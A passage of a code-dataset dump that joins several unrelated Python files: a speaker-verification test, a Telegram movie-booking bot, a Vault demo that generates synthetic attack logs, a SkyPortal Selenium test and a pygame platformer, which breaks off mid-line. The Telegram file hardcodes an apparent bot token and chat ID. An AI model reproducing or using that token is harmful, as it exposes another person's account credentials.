{correct}')\n print(f'num of incorrect: {incorrect}')\n print(f'accuracy for argmax identification: {acc*100:.2f}%')\n print(f'accuracy for verification with threshold={threshold}: {veri*100:.2f}%')\n\n\nif __name__ == '__main__':\n# \tget_id_result()\n\tparser = argparse.ArgumentParser()\n\tsubparsers = parser.add_subparsers()\n\tparser_test = subparsers.add_parser('test')\n# \tparser_test.add_argument('--test_users', nargs='*', default = None)#, default = 'data/wav/enroll/19-enroll.wav')\n\tparser_test.add_argument('--threshold', default = 0.95)#, default = 'data/wav/test/19-test.wav')\n\tparser_test.add_argument('--pairs', default = os.path.join(TEST_PATH,'../',TEST_PAIRS_FILE))\n# \tparser_scoring.add_argument('--threshold', default = 0.1)\n\tparser_test.set_defaults(func=test)\n\topt = parser.parse_args()\n\topt.func(opt)\n\n\n\n","sub_path":"model/modelv2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"432273761","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 2019. 4. 13.\r\n\r\n@author: jeong\r\n'''\r\nimport telepot\r\nimport time\r\n\r\ntoken= \"836234072:AAEKFOj3hmfbhg-pY5ScDrbxPUiYCG39xe8\"\r\n\r\nmc = \"-1001159590408\"\r\n\r\nbot = telepot.Bot(token)\r\n\r\nInfoMsg = \"# 용산 IMAX 예매정보 안내봇입니다. #\\n검색하려면 'ㄱㄱ'를 입력하세요.\"\r\n\r\nstatus = True\r\n\r\nbot.sendMessage(mc, \"안녕하세요 cgVot입니다\")\r\n\r\nwhile status == True:\r\n time.sleep(5) \r\n","sub_path":"CGV_TelegramBot/Crawling/telegrambot_ex_for_chaanel.py","file_name":"telegrambot_ex_for_chaanel.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561489988","text":"from logs_template_vault import vault_alias_assigned_log, vault_group_creation_log, vault_entity_creation_log, vault_failed_authentication_log, vault_wrong_authentication_method_log, vault_permission_denied_log\nimport log_data_vault\n\nlogs_program_vault = [\n\n ##################################################################################### \n # User Story\n #\n # Benign activities 10:00-17:00\n # Malicious activities 3:00 - 5:00\n #\n # 10:00 - 10:30 Created 3 groups\n # Created 3 policies\n # Each policy was assigned to 1 group\n # 10:45 - 11:15 3 new entities were created\n # 3 new aliases were created\n #\n # 3:00 - 3:30 Authentication attempts from malicious IPs, every minute 5 different IPs\n # 10:00 - 17:00 Authentication attempts from benign IPs - every 30 minutes one IP is authenticated - total 20 IPs\n # 3:00 - 3:30 Failed authentication from malicious IPs, every minute 5 different IPs\n # 10:00 - 17:00 Failed authentication from benign IPs - every 30 minutes one IP is authenticated - total 20 IPs\n # 3:00 - 3:10 A single user tries to login and Fails - it can be by a tool (so every 5 seconds) or manual (every 2 minutes) ???\n # 4:00 - 4:30 Unauthorized action, at least 3 different actions, every 5 minutes 1 action\n #\n # List of logs:\n # vault_group_creation_log\n # vault_permission_denied_log\n # vault_alias_assigned_log\n # vault_entity_creation_log\n # vault_wrong_authentication_method_log\n # vault_failed_authentication_log\n ##################################################################################### \n\n #\n {\"log_type\": vault_failed_authentication_log, \"from_time\": \"03:00:00\", \"to_time\": \"03:30:00\", \"every\": 60*1, \"cross_fields\": False,\n \"add_logzio_security\": True, \"ip_field\": '_source|request|remote_address',\n \"fields\": [\n {\"field_name\": '_source|request|path', \"values\": log_data_vault.vault_attacker_user},\n {\"field_name\": '_source|request|remote_address', \"values\": log_data_vault.vault_attackers}\n ]\n }\n]\n","sub_path":"demo-hashi_vault/program_vault.py","file_name":"program_vault.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"580814109","text":"import uuid\n\nfrom .. import api\nfrom selenium.common.exceptions import TimeoutException\n\nfrom tdtax import taxonomy, __version__\n\nfrom datetime import datetime, timezone\n\n\ndef test_add_new_source_renders_on_group_sources_page(\n driver,\n super_admin_user_two_groups,\n public_group,\n public_group2,\n upload_data_token_two_groups,\n taxonomy_token_two_groups,\n classification_token_two_groups,\n):\n\n driver.get(f\"/become_user/{super_admin_user_two_groups.id}\") # become a super-user\n\n # go to the group sources page\n driver.get(f\"/group_sources/{public_group.id}\")\n\n # make sure the group name appears\n driver.wait_for_xpath(f\"//*[text()[contains(., '{public_group.name}')]]\")\n\n # make a new object/source and save the time when it was posted\n obj_id = str(uuid.uuid4())\n t0 = datetime.now(timezone.utc)\n\n # upload a new source, saved to the public group\n status, data = api(\n 'POST',\n 'sources',\n data={\n 'id': f'{obj_id}',\n 'ra': 234.22,\n 'dec': -22.33,\n 'redshift': 0.153,\n 'altdata': {'simbad': {'class': 'RRLyr'}},\n 'transient': False,\n 'ra_dis': 2.3,\n 'group_ids': [public_group.id, public_group2.id],\n },\n token=upload_data_token_two_groups,\n )\n assert status == 200\n assert data['data']['id'] == f'{obj_id}'\n\n # need to reload the page to see changes!\n driver.get(f\"/group_sources/{public_group.id}\")\n\n # find the name of the newly added source\n driver.wait_for_xpath(f\"//a[contains(@href, '/source/{obj_id}')]\")\n\n # find the date it was saved\n driver.wait_for_xpath(\n f\"//*[text()[contains(., '{t0.strftime('%Y-%m-%dT%H:%M')}')]]\"\n )\n\n # check the redshift shows up\n driver.wait_for_xpath(f\"//*[text()[contains(., '{'0.153'}')]]\")\n\n # little triangle you push to expand the table\n expand_button = driver.wait_for_xpath(\"//*[@id='expandable-button']\")\n driver.scroll_to_element_and_click(expand_button)\n\n # make sure the div containing the individual source appears\n driver.wait_for_xpath(\"//tr[contains(@class, 'MuiTableRow-root')]\")\n\n try: # the vega plot may take some time to appear, and in the meanwhile the MUI drawer gets closed for some reason.\n # make sure the table row opens up and show the vega plot\n driver.wait_for_xpath(\"//*[@class='vega-embed']\", timeout=2)\n except TimeoutException:\n # try again to click this triangle thingy to open the drawer\n expand_button = driver.wait_for_xpath(\"//*[@id='expandable-button']\")\n driver.scroll_to_element_and_click(expand_button)\n\n # with the drawer opened again, it should now work...\n driver.wait_for_xpath(\n \"//*[@class='vega-embed']\"\n ) # make sure the table row opens up and show the vega plot\n\n # post a taxonomy and classification\n status, data = api(\n 'POST',\n 'taxonomy',\n data={\n 'name': \"test taxonomy\" + str(uuid.uuid4()),\n 'hierarchy': taxonomy,\n 'group_ids': [public_group.id, public_group2.id],\n 'provenance': f\"tdtax_{__version__}\",\n 'version': __version__,\n 'isLatest': True,\n },\n token=taxonomy_token_two_groups,\n )\n assert status == 200\n taxonomy_id = data['data']['taxonomy_id']\n\n status, data = api(\n 'POST',\n 'classification',\n data={\n 'obj_id': obj_id,\n 'classification': 'Algol',\n 'taxonomy_id': taxonomy_id,\n 'probability': 1.0,\n 'group_ids': [public_group.id],\n },\n token=classification_token_two_groups,\n )\n assert status == 200\n\n # check the classification shows up (it should not show up without a page refresh!)\n try:\n driver.wait_for_xpath(f\"//*[text()[contains(., '{'Algol'}')]]\", timeout=1)\n\n except TimeoutException:\n pass # the classification should not appear on its own, so we ignore this error\n\n # making sure the drawer is still open even after posting a classification!\n driver.wait_for_xpath(\"//*[@class='vega-embed']\")\n\n # need to reload the page to see changes!\n driver.get(f\"/group_sources/{public_group.id}\")\n\n # check the classification does show up after a refresh\n driver.wait_for_xpath(f\"//*[text()[contains(., '{'Algol'}')]]\")\n\n status, data = api(\n 'POST',\n 'classification',\n data={\n 'obj_id': obj_id,\n 'classification': 'RS CVn',\n 'taxonomy_id': taxonomy_id,\n 'probability': 1.0,\n 'group_ids': [public_group2.id],\n },\n token=classification_token_two_groups,\n )\n assert status == 200\n\n # need to reload the page to see changes!\n driver.get(f\"/group_sources/{public_group.id}\")\n\n # make sure the new classification, made to group 2, does NOT show up!\n driver.wait_for_xpath(f\"//*[text()[contains(., '{'Algol'}')]]\")\n\n\ndef test_request_source(\n driver,\n super_admin_user_two_groups,\n public_group,\n public_group2,\n upload_data_token_two_groups,\n):\n\n driver.get(f\"/become_user/{super_admin_user_two_groups.id}\") # become a super-user\n\n # go to the group sources page\n driver.get(f\"/group_sources/{public_group.id}\")\n\n # make sure the group name appears\n driver.wait_for_xpath(f\"//*[text()[contains(., '{public_group.name}')]]\")\n\n obj_id = str(uuid.uuid4())\n\n # upload a new source, saved to the public group\n status, data = api(\n 'POST',\n 'sources',\n data={\n 'id': f'{obj_id}',\n 'ra': 234.22,\n 'dec': -22.33,\n 'redshift': 0.153,\n 'altdata': {'simbad': {'class': 'RRLyr'}},\n 'transient': False,\n 'ra_dis': 2.3,\n 'group_ids': [public_group2.id],\n },\n token=upload_data_token_two_groups,\n )\n assert status == 200\n assert data['data']['id'] == f'{obj_id}'\n\n # reload the group sources page\n driver.get(f\"/group_sources/{public_group.id}\")\n\n # there should not be any new sources (the source is in group2)\n driver.wait_for_xpath(\"//*[text()[contains(., 'No sources')]]\")\n\n # request this source to be added to group1\n status, data = api(\n 'POST',\n 'source_groups',\n data={'objId': f'{obj_id}', 'inviteGroupIds': [public_group.id]},\n token=upload_data_token_two_groups,\n )\n assert status == 200\n\n # reload the group sources page\n driver.get(f\"/group_sources/{public_group.id}\")\n\n # make sure the second table appears\n driver.wait_for_xpath(\"//*[text()[contains(., 'Requested to save')]]\")\n\n # find the name of the newly added source\n driver.wait_for_xpath(f\"//a[contains(@href, '/source/{obj_id}')]\")\n\n # make sure the second table has \"save/ignore\" buttons\n driver.wait_for_xpath(\"//*[text()[contains(., 'Save')]]\")\n driver.wait_for_xpath(\"//*[text()[contains(., 'Ignore')]]\")\n","sub_path":"skyportal/tests/frontend/test_group_sources.py","file_name":"test_group_sources.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"642314662","text":"# -*- coding: cp1252 -*-\r\n# SuperPac\r\n# Autor: Felipe Araújo de Andrade\r\n# data: 15/08/2012\r\n\r\nimport pygame\r\nfrom pygame.locals import*\r\nfrom random import*\r\nfrom sys import exit as sair\r\n\r\npygame.init()\r\npygame.mixer.pre_init()\r\npygame.mixer.init()\r\n\r\ntela = pygame.display.set_mode((650, 550))\r\n\r\npygame.mouse.set_visible(0)\r\n\r\nicone = pygame.image.load(\"imagens/icone.png\")\r\n\r\npygame.display.set_caption(\"SuperPac\")\r\n\r\npygame.display.set_icon(icone)\r\n\r\nclock = pygame.time.Clock()\r\n\r\nfonte = [pygame.font.Font(\"fontes/calibri.ttf\", 25),\r\n pygame.font.Font(\"fontes/calibrib.ttf\", 23),\r\n pygame.font.Font(\"fontes/calibri.ttf\", 23),\r\n pygame.font.Font(\"fontes/calibri.ttf\", 40),\r\n pygame.font.Font(\"fontes/calibrib.ttf\", 40),\r\n pygame.font.Font(\"fontes/Showcard Gothic.TTF\", 32),\r\n pygame.font.Font(\"fontes/calibrib.ttf\", 34),\r\n pygame.font.Font(\"fontes/calibri.ttf\", 34),\r\n pygame.font.Font(\"fontes/calibrib.ttf\", 30),\r\n pygame.font.Font(\"fontes/calibrib.ttf\", 26),\r\n pygame.font.Font(\"fontes/calibri.ttf\", 28),\r\n pygame.font.Font(\"fontes/calibrib.ttf\", 28)]\r\n\r\ndef toca_som(arquivo):\r\n pygame.mixer.Sound(\"sons/\"+arquivo).play()\r\n\r\nplataforma_mundo1 = pygame.image.load(\"imagens/jogo/plataforma1_fase1.png\")\r\nplataforma_mundo2 = pygame.image.load(\"imagens/jogo/plataforma1_fase2.png\")\r\nplataforma_mundo3 = pygame.image.load(\"imagens/jogo/plataforma1_fase3.png\")\r\nplataforma_mundo4 = pygame.image.load(\"imagens/jogo/plataforma1_fase4.png\")\r\nplataforma_mundo5 = pygame.image.load(\"imagens/jogo/plataforma1_fase5.png\")\r\nplataforma1 = pygame.image.load(\"imagens/jogo/plataforma1.png\")\r\nplataforma2 = pygame.image.load(\"imagens/jogo/plataforma2.png\")\r\nplataforma3 = pygame.image.load(\"imagens/jogo/plataforma3.png\")\r\nplataforma2_mt = pygame.image.load(\"imagens/jogo/plataforma2_mt.png\")\r\nplataforma3_mt = pygame.image.load(\"imagens/jogo/plataforma3_mt.png\")\r\nplataforma1_noite = pygame.image.load(\"imagens/jogo/plataforma1_noite.png\")\r\npacman = {'R':[pygame.image.load(\"imagens/jogo/pacmanR\"+str(i)+\".png\") for i in range(1,5)],\r\n 'L':[pygame.image.load(\"imagens/jogo/pacmanL\"+str(i)+\".png\") for i in range(1,5)],\r\n 'D':[pygame.image.load(\"imagens/jogo/pacmanD\"+str(i)+\".png\") for i in range(1,6)]}\r\nevil_pacman = {'A':{'R':[pygame.image.load(\"imagens/jogo/evil_pacmanAR\"+str(i)+\".png\") for i in range(1,5)],\r\n 'L':[pygame.image.load(\"imagens/jogo/evil_pacmanAL\"+str(i)+\".png\") for i in range(1,5)]},\r\n 'B':{'R':[pygame.image.load(\"imagens/jogo/evil_pacmanBR\"+str(i)+\".png\") for i in range(1,5)],\r\n 'L':[pygame.image.load(\"imagens/jogo/evil_pacmanBL\"+str(i)+\".png\") for i in range(1,5)]}}\r\n\r\nplataforma_movel1 = pygame.image.load(\"imagens/jogo/plataforma3_fase1.png\")\r\nbackground1 = pygame.image.load(\"imagens/jogo/background1.gif\")\r\nbackground2 = pygame.image.load(\"imagens/jogo/background2.gif\")\r\nbackground3 = pygame.image.load(\"imagens/jogo/background3.gif\")\r\nbackground4 = pygame.image.load(\"imagens/jogo/background4.gif\")\r\nbackground5A = pygame.image.load(\"imagens/jogo/background5A.gif\")\r\nbackground5B = pygame.image.load(\"imagens/jogo/background5B.gif\")\r\nbackground_nova_fase = pygame.image.load(\"imagens/jogo/background_nova_fase.bmp\")\r\nbackground_fim_de_jogo = pygame.image.load(\"imagens/jogo/back_fim_de_jogo.png\")\r\nbackground_zeramento = pygame.image.load(\"imagens/jogo/background_zeramento.png\")\r\nbackground_nova_fase.set_alpha(127)\r\nfim_de_jogo = pygame.image.load(\"imagens/jogo/fim_de_jogo.png\")\r\nfases = [pygame.image.load(\"imagens/jogo/fase\"+str(i)+\".png\") for i in range(1,6)]\r\nbola1 = pygame.image.load(\"imagens/jogo/it1.png\")\r\nsuperficie1 = [pygame.image.load(\"imagens/jogo/superficie\"+str(i)+\"1.png\") for i in [1,2,3]]\r\nnuvens = [pygame.image.load(\"imagens/jogo/nuvem\"+str(i)+\".png\") for i in range(1,4)]\r\nfantasma1 = {'R':[pygame.image.load(\"imagens/jogo/fantasma1\"+cor+\"R.png\") for cor in [\"azul\",\"verde\",\"vermelho\",\"transparente\"]],\r\n 'L':[pygame.image.load(\"imagens/jogo/fantasma1\"+cor+\"L.png\") for cor in [\"azul\",\"verde\",\"vermelho\",\"transparente\"]]}\r\nmaca_img = pygame.image.load(\"imagens/jogo/maca.png\")\r\nevil_maca_img = pygame.image.load(\"imagens/jogo/evil_maca.png\")\r\npera_img = pygame.image.load(\"imagens/jogo/pera.png\")\r\nvidas_icone = pygame.image.load(\"imagens/jogo/vidas_icone.png\")\r\nevil_vidas_icone = pygame.image.load(\"imagens/jogo/evil_vidas_icone.png\")\r\nmunicao_icone = pygame.image.load(\"imagens/jogo/municao_icone.png\")\r\nchave = pygame.image.load(\"imagens/jogo/chave.png\")\r\nchave2 = pygame.image.load(\"imagens/jogo/chave2.png\")\r\npassagem = [pygame.image.load(\"imagens/jogo/passagem_fechada.png\"),\r\n pygame.image.load(\"imagens/jogo/passagem_aberta.png\")]\r\npassagem2 = [pygame.image.load(\"imagens/jogo/passagem_fechada2.png\"),\r\n pygame.image.load(\"imagens/jogo/passagem_aberta.png\")]\r\nfantasma2 = [pygame.image.load(\"imagens/jogo/fantasma21.bmp\"),pygame.image.load(\"imagens/jogo/fantasma22.bmp\"),\r\n pygame.image.load(\"imagens/jogo/fantasma21.bmp\"),pygame.image.load(\"imagens/jogo/fantasma22.bmp\"),\r\n pygame.image.load(\"imagens/jogo/fantasma23.bmp\")]\r\nfor imagem in fantasma2:\r\n imagem.set_colorkey((255,0,0))\r\nfor i in range(2,4):\r\n fantasma2[i].set_alpha(127)\r\npacwoman = [pygame.image.load(\"imagens/jogo/pacwoman\"+str(i)+\".png\") for i in range(1,5)]\r\nlaco_pacwoman = pygame.image.load(\"imagens/jogo/laco_pacwoman.png\")\r\nemocao_pacwoman = pygame.image.load(\"imagens/jogo/emocao_pacwoman.png\")\r\ntitulo_inserir_nome = pygame.image.load(\"imagens/jogo/titulo_inserir_nome.png\")\r\ntitulo_parabens = pygame.image.load(\"imagens/jogo/titulo_parabens.png\")\r\ntitulo_resultado_final = pygame.image.load(\"imagens/jogo/titulo_resultado_final.png\")\r\nbackground_menu = pygame.image.load(\"imagens/menu/background_menu.png\")\r\nbotoes_opc1 = pygame.image.load(\"imagens/menu/botoes_opc1.png\")\r\nbotoes_opc2 = pygame.image.load(\"imagens/menu/botoes_opc2.png\")\r\nbotao_espaco = pygame.image.load(\"imagens/menu/botao_espaco.png\")\r\nbotao_enter = pygame.image.load(\"imagens/menu/botao_enter.png\")\r\nbackground_submenu = pygame.image.load(\"imagens/menu/background_submenu.bmp\")\r\nbackground_submenu.set_colorkey((255,0,0))\r\nbackground_submenu.set_alpha(128)\r\ntitulo_jogo = pygame.image.load(\"imagens/menu/titulo_jogo.png\")\r\ntitulo_instrucoes = pygame.image.load(\"imagens/menu/titulo_instrucoes.png\")\r\ntitulo_configuracoes = pygame.image.load(\"imagens/menu/titulo_configuracoes.png\")\r\ntitulo_recordes = pygame.image.load(\"imagens/menu/titulo_recordes.png\")\r\ntitulo_creditos = pygame.image.load(\"imagens/menu/titulo_creditos.png\")\r\nescolha = pygame.image.load(\"imagens/menu/escolhido.bmp\")\r\nescolha.set_colorkey((255,0,255))\r\npacman_menu = [pygame.image.load(\"imagens/menu/pacman_menu\"+str(i)+\".png\") for i in range(1,5)]\r\n\r\n\r\nclass Mundo1():\r\n\r\n def __init__(self):\r\n self.rects_plataforma1 = [pygame.Rect(x,y,175,35) for x,y in ((50,350),(2385,442),(2660,442),(2935,442),(3352,350),(4762,400))]\r\n self.rects_sup1 = [pygame.Rect(x,550-superficie1[0].get_rect().h,175,73) for x in ((1415,1590,4137,4312,4487))]\r\n self.rects_sup2 = [pygame.Rect(x,550-superficie1[1].get_rect().h,210,143) for x in ((325,535,845,1205,1865,2075,3927))]\r\n self.rects_sup3 = [pygame.Rect(x,550-superficie1[2].get_rect().h,150,210) for x in ((1055,3627,3777))]\r\n self.rects = self.rects_plataforma1+self.rects_sup1+self.rects_sup2+self.rects_sup3\r\n self.x_nuvens = [655, 855, 1155, 1360]\r\n\r\n def colisao(self, direcao, vel, obj):\r\n for rect in self.rects:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n return False\r\n\r\n def atualiza(self, parametro):\r\n for rect in self.rects:\r\n rect.move_ip(parametro,0)\r\n \r\n def desenha(self, tela):\r\n self.x_nuvens[0] -= 1\r\n if self.x_nuvens[0] < -73:\r\n self.x_nuvens[0] = 655\r\n self.x_nuvens[1] -= 1\r\n if self.x_nuvens[1] < -150:\r\n self.x_nuvens[1] = 855\r\n self.x_nuvens[2] -= 1\r\n if self.x_nuvens[2] < -108:\r\n self.x_nuvens[2] = 1155\r\n self.x_nuvens[3] -= 1\r\n if self.x_nuvens[3] < -73:\r\n self.x_nuvens[3] = 1360\r\n \r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background1,(655,555)),(-5,-5))\r\n tela.blit(nuvens[0], (self.x_nuvens[0],105))\r\n tela.blit(nuvens[1], (self.x_nuvens[1],205))\r\n tela.blit(nuvens[2], (self.x_nuvens[2],85))\r\n tela.blit(nuvens[2], (self.x_nuvens[3],185))\r\n\r\n for rect in self.rects_sup1:\r\n tela.blit(superficie1[0], rect)\r\n for rect in self.rects_sup2:\r\n tela.blit(superficie1[1], rect)\r\n for rect in self.rects_sup3:\r\n tela.blit(superficie1[2], rect)\r\n\r\n for i in range(1,len(self.rects_plataforma1)):\r\n if i != 4:\r\n tela.blit(plataforma_mundo1, self.rects_plataforma1[i])\r\n else:\r\n tela.blit(plataforma1, self.rects_plataforma1[i])\r\n \r\n tela.blit(plataforma1, self.rects_plataforma1[0])\r\n\r\nclass Mundo2():\r\n\r\n def __init__(self):\r\n self.rects_plataforma = [pygame.Rect(x,y,175,35) for x,y in ((50,350),(4927,375))]\r\n self.rects_plataforma1 = [pygame.Rect(x,y,140,35) for x,y in ((2880,400),(3140,435),(3400,470),(3785,435),(5692,400))]\r\n self.rects_plataforma2 = [pygame.Rect(x,y,45,45) for x,y in ((325,385),(3640,442),(6094,350))]\r\n self.rects_sup1 = [pygame.Rect(x,550-superficie1[0].get_rect().h,175,73) for x in ((470,645,1960,2585))]\r\n self.rects_sup2 = [pygame.Rect(x,550-superficie1[1].get_rect().h,210,143) for x in ((940,1420,1630,2255,4607,5212))]\r\n self.rects_sup3 = [pygame.Rect(x,550-superficie1[2].get_rect().h,150,210) for x in ((1270,4187,4457,5422))]\r\n self.rects = self.rects_plataforma+self.rects_plataforma1+self.rects_plataforma2+self.rects_sup1+self.rects_sup2+self.rects_sup3\r\n\r\n def colisao(self, direcao, vel, obj):\r\n for rect in self.rects:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n return False\r\n\r\n def atualiza(self, parametro):\r\n for rect in self.rects:\r\n rect.move_ip(parametro,0)\r\n \r\n def desenha(self, tela):\r\n \r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background2,(655,555)),(-5,-5))\r\n\r\n for rect in self.rects_sup1:\r\n tela.blit(superficie1[0], rect)\r\n for rect in self.rects_sup2:\r\n tela.blit(superficie1[1], rect)\r\n for rect in self.rects_sup3:\r\n tela.blit(superficie1[2], rect)\r\n\r\n for rect in self.rects_plataforma:\r\n tela.blit(plataforma1, rect)\r\n for rect in self.rects_plataforma1:\r\n tela.blit(plataforma_mundo2, rect)\r\n for rect in self.rects_plataforma2:\r\n tela.blit(plataforma2, rect)\r\n\r\nclass Mundo3():\r\n\r\n def __init__(self):\r\n self.rects_plataforma = [pygame.Rect(x,y,175,35) for x,y in ((50,350),(6582,375))]\r\n self.rects_plataforma1 = [pygame.Rect(x,y,105,35) for x,y in ((2095,442),(2485,435),(2875,400),(5802,400),(6192,400))]\r\n self.rects_plataforma2 = [pygame.Rect(x,y,45,45) for x,y in ((2320,407),(2710,400),(3265,395),(3100,395),(3430,435),(6027,350),(6417,350),(7319,350))]\r\n self.rects_plataforma3 = [pygame.Rect(x,y,45,45) for x,y in ((2275,407),(2365,407),(2665,400),(2755,400),(3220,395),(3310,395),(6372,350),(6462,350))]\r\n self.rects_sup1 = [pygame.Rect(x,550-superficie1[0].get_rect().h,175,73) for x in ((1055,1230,1615,1790,4117))]\r\n self.rects_sup2 = [pygame.Rect(x,550-superficie1[1].get_rect().h,210,143) for x in ((355,845,1405,3907,4292,4782,5122,5462))]\r\n self.rects_sup3 = [pygame.Rect(x,550-superficie1[2].get_rect().h,150,210) for x in ((695,3757,4502,6887))]\r\n self.rects = self.rects_plataforma+self.rects_plataforma1+self.rects_plataforma2+self.rects_sup1+self.rects_sup2+self.rects_sup3\r\n self.tempo_plataforma3 = 0\r\n self.sumir_plataforma3 = -1\r\n self.x_nuvens = [655, 855, 1155]\r\n \r\n def colisao(self, direcao, vel, obj):\r\n for rect in self.rects:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n for rect in self.rects_plataforma3:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n self.sumir_plataforma3 = self.rects_plataforma3.index(rect)\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n if self.sumir_plataforma3 >= 0:\r\n self.tempo_plataforma3 += 1\r\n if self.tempo_plataforma3 > 7:\r\n self.rects_plataforma3.pop(self.sumir_plataforma3)\r\n self.sumir_plataforma3 = -1\r\n self.tempo_plataforma3 = 0\r\n return False\r\n\r\n def atualiza(self, parametro):\r\n for rect in self.rects:\r\n rect.move_ip(parametro,0)\r\n for rect in self.rects_plataforma3:\r\n rect.move_ip(parametro,0)\r\n \r\n def desenha(self, tela):\r\n \r\n self.x_nuvens[0] -= 1\r\n if self.x_nuvens[0] < -73:\r\n self.x_nuvens[0] = 655\r\n self.x_nuvens[1] -= 1\r\n if self.x_nuvens[1] < -150:\r\n self.x_nuvens[1] = 855\r\n self.x_nuvens[2] -= 1\r\n if self.x_nuvens[2] < -108:\r\n self.x_nuvens[2] = 1155\r\n \r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background3,(655,555)),(-5,-5))\r\n tela.blit(nuvens[0], (self.x_nuvens[0],105))\r\n tela.blit(nuvens[1], (self.x_nuvens[1],205))\r\n tela.blit(nuvens[2], (self.x_nuvens[2],85))\r\n\r\n for rect in self.rects_sup1:\r\n tela.blit(superficie1[0], rect)\r\n for rect in self.rects_sup2:\r\n tela.blit(superficie1[1], rect)\r\n for rect in self.rects_sup3:\r\n tela.blit(superficie1[2], rect)\r\n\r\n for rect in self.rects_plataforma:\r\n tela.blit(plataforma1, rect)\r\n for rect in self.rects_plataforma1:\r\n tela.blit(plataforma_mundo3, rect)\r\n for rect in self.rects_plataforma2:\r\n tela.blit(plataforma2, rect)\r\n for rect in self.rects_plataforma3:\r\n tela.blit(plataforma3, rect)\r\n\r\nclass Mundo4():\r\n\r\n def __init__(self):\r\n self.rects_plataforma = [pygame.Rect(x,y,175,35) for x,y in ((50,350),(9569,375))]\r\n self.rects_plataforma1 = [pygame.Rect(x,y,70,35) for x,y in ((365,385),(560,420),(5585,432),(5950,432),(6315,432),(8187,387),(8257,422),(8327,457),(8522,457),(8717,457),(8787,422),(8857,387))]\r\n self.rects_plataforma2 = [pygame.Rect(x,y,45,45) for x,y in ((755,385),(925,385),(1095,385),(1265,385),(9222,422),(5370,422),(5460,422),(5735,422),(5825,422),(6100,422),\r\n (6190,422),(6465,422),(6555,422))]\r\n self.rects_plataforma3 = [pygame.Rect(x,y,45,45) for x,y in ((5415,422),(5780,422),(6145,422),(6510,422),(9052,422))]\r\n self.rects_sup1 = [pygame.Rect(x,550-superficie1[0].get_rect().h,175,73) for x in ((1445,2190,2365,2540,2715,3460,4115,4770,7667))]\r\n self.rects_sup2 = [pygame.Rect(x,550-superficie1[1].get_rect().h,210,143) for x in ((1620,1980,2890,3250,3770,4425,5080,7307,7842,9879,10224))]\r\n self.rects_sup3 = [pygame.Rect(x,550-superficie1[2].get_rect().h,150,210) for x in ((1830,3100,6857,7007,7157,7517))]\r\n self.rects = self.rects_plataforma+self.rects_plataforma1+self.rects_plataforma2+self.rects_sup1+self.rects_sup2+self.rects_sup3\r\n self.tempo_plataforma3 = 0\r\n self.sumir_plataforma3 = -1\r\n \r\n def colisao(self, direcao, vel, obj):\r\n for rect in self.rects:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n for rect in 